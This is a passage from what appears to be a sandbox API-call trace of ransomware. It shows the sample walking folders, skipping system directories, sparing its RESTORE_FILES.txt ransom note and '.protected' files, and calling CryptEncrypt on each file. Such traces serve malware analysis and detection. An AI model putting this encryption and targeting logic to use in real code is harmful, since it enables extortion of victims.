(in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 68 [0093.143] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.143] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 89 [0093.144] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0093.144] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0093.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 91 [0093.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.144] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.144] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\.") returned 91 [0093.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.144] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.144] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\..") returned 92 [0093.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.144] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 95 [0093.145] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.145] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 97 [0093.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\.") returned 97 [0093.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.145] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\..") returned 98 [0093.145] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.145] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 108 [0093.145] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0093.145] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.146] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.146] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.146] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.146] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.146] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.146] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.146] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0093.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 100 [0093.146] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0093.146] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.146] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.146] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files (x86)") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="$Recycle.bin") returned 1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="System Volume Information") returned -1 [0093.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 100 [0093.147] StrStrIW (lpFirst="netfol.ico", lpSrch=".protected") returned 0x0 [0093.147] lstrcmpW (lpString1="netfol.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files (x86)") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="$Recycle.bin") returned 1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="System Volume Information") returned -1 [0093.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 102 [0093.147] StrStrIW (lpFirst="pictures.ico", lpSrch=".protected") returned 0x0 [0093.147] lstrcmpW (lpString1="pictures.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 102 [0093.148] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.148] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 107 [0093.148] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.148] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Windows") returned -1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 103 [0093.148] StrStrIW (lpFirst="ringtones.ico", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="ringtones.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Windows") returned -1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files (x86)") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="$Recycle.bin") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="System Volume Information") returned -1 [0093.149] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 102 [0093.149] StrStrIW (lpFirst="settings.ico", lpSrch=".protected") returned 0x0 [0093.149] lstrcmpW (lpString1="settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Windows") returned -1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files (x86)") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="$Recycle.bin") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="System Volume Information") returned -1 [0093.149] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 98 [0093.149] StrStrIW (lpFirst="sync.ico", lpSrch=".protected") returned 0x0 [0093.149] lstrcmpW (lpString1="sync.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0093.149] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0093.150] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 99 [0093.150] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0093.150] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0093.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.150] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Windows") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files (x86)") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="$Recycle.bin") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="System Volume Information") returned 1 [0093.150] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 97 [0093.150] StrStrIW (lpFirst="wmp.ico", lpSrch=".protected") returned 0x0 [0093.150] lstrcmpW (lpString1="wmp.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device 